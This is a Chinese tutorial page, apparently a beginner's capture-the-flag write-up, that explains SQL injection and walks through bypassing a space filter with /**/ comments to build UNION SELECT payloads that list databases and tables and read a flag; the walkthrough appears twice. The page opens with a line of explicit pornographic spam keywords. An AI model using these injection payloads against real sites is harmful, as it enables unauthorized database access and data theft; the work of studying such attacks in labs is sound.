欧美大屁股bbbbxxxx,狼人大香伊蕉国产www亚洲,男ji大巴进入女人的视频小说,男人把ji大巴放进女人免费视频,免费情侣作爱视频

歡迎來(lái)到入門(mén)教程網(wǎng)!

MsSql

當(dāng)前位置:主頁(yè) > 數(shù)據(jù)庫(kù) > MsSql >

分享一個(gè)簡(jiǎn)單的sql注入

來(lái)源:本站原創(chuàng)|時(shí)間:2020-01-10|欄目:MsSql|點(diǎn)擊: 次

所謂SQL注入,就是通過(guò)把SQL命令插入到Web表單提交或輸入域名或頁(yè)面請(qǐng)求的查詢字符串,最終達(dá)到欺騙服務(wù)器執(zhí)行惡意的SQL命令。具體來(lái)說(shuō),它是利用現(xiàn)有應(yīng)用程序,將(惡意)的SQL命令注入到后臺(tái)數(shù)據(jù)庫(kù)引擎執(zhí)行的能力,它可以通過(guò)在Web表單中輸入(惡意)SQL語(yǔ)句得到一個(gè)存在安全漏洞的網(wǎng)站上的數(shù)據(jù)庫(kù),而不是按照設(shè)計(jì)者意圖去執(zhí)行SQL語(yǔ)句。比如先前的很多影視網(wǎng)站泄露VIP會(huì)員密碼大多就是通過(guò)WEB表單遞交查詢字符暴出的,這類表單特別容易受到sql注入攻擊。

分別輸入1,2,3有對(duì)應(yīng)的結(jié)果

使用'會(huì)報(bào)錯(cuò),于是

構(gòu)造常用的sql語(yǔ)句:1' and '1'='1

沒(méi)有反應(yīng)試一試1' and '1'='2

還是沒(méi)反應(yīng),工具提示,應(yīng)該是過(guò)濾了什么,改一下sql語(yǔ)句試一試

1and1=1

可以顯示東西,經(jīng)過(guò)判斷過(guò)濾了空格,我們使用/**/來(lái)代替空格

試一試1'/**/and/**/'1'='1

發(fā)現(xiàn)有結(jié)果了:

于是構(gòu)建sql語(yǔ)句:

判斷有那些數(shù)據(jù)庫(kù):

1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1

可以看到結(jié)果:

查看有哪些數(shù)據(jù)表:

1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1

發(fā)現(xiàn)了flag的表,我們猜測(cè)應(yīng)該是在web1數(shù)據(jù)庫(kù)中并且字段就是flag(其實(shí)就在本頁(yè)面的數(shù)據(jù)庫(kù)中)

故:

1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1

本人也是初學(xué)者,參考了許多大佬的wp 自己寫(xiě)出來(lái)后有什么錯(cuò)誤的地方,希望大家指出,謝謝!

根據(jù)頁(yè)面提示,到底過(guò)濾了什么東西?可以知道一定過(guò)濾了什么....

分別輸入1,2,3有對(duì)應(yīng)的結(jié)果

使用'會(huì)報(bào)錯(cuò),于是

構(gòu)造常用的sql語(yǔ)句:1' and '1'='1

沒(méi)有反應(yīng)試一試1' and '1'='2

還是沒(méi)反應(yīng),工具提示,應(yīng)該是過(guò)濾了什么,改一下sql語(yǔ)句試一試

1and1=1

可以顯示東西,經(jīng)過(guò)判斷過(guò)濾了空格,我們使用/**/來(lái)代替空格

試一試1'/**/and/**/'1'='1

發(fā)現(xiàn)有結(jié)果了:

于是構(gòu)建sql語(yǔ)句:

判斷有那些數(shù)據(jù)庫(kù):

1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1

可以看到結(jié)果:

查看有哪些數(shù)據(jù)表:

1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1

發(fā)現(xiàn)了flag的表,我們猜測(cè)應(yīng)該是在web1數(shù)據(jù)庫(kù)中并且字段就是flag(其實(shí)就在本頁(yè)面的數(shù)據(jù)庫(kù)中)

故:

1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1

總結(jié)

以上所述是小編給大家介紹的一個(gè)簡(jiǎn)單的sql注入,希望對(duì)大家有所幫助,如果大家有任何疑問(wèn)請(qǐng)給我留言,小編會(huì)及時(shí)回復(fù)大家的。在此也非常感謝大家對(duì)我們網(wǎng)站的支持!

上一篇:SQL Server ltrim(rtrim()) 去不掉空格的原因分析

欄    目:MsSql

下一篇:SQL SERVER 中構(gòu)建執(zhí)行動(dòng)態(tài)SQL語(yǔ)句的方法

本文標(biāo)題:分享一個(gè)簡(jiǎn)單的sql注入

本文地址:http://mengdiqiu.com.cn/a1/MsSql/10452.html

網(wǎng)頁(yè)制作CMS教程網(wǎng)絡(luò)編程軟件編程腳本語(yǔ)言數(shù)據(jù)庫(kù)服務(wù)器

如果侵犯了您的權(quán)利,請(qǐng)與我們聯(lián)系,我們將在24小時(shí)內(nèi)進(jìn)行處理、任何非本站因素導(dǎo)致的法律后果,本站均不負(fù)任何責(zé)任。

聯(lián)系QQ:835971066 | 郵箱:835971066#qq.com(#換成@)

Copyright © 2002-2020 腳本教程網(wǎng) 版權(quán)所有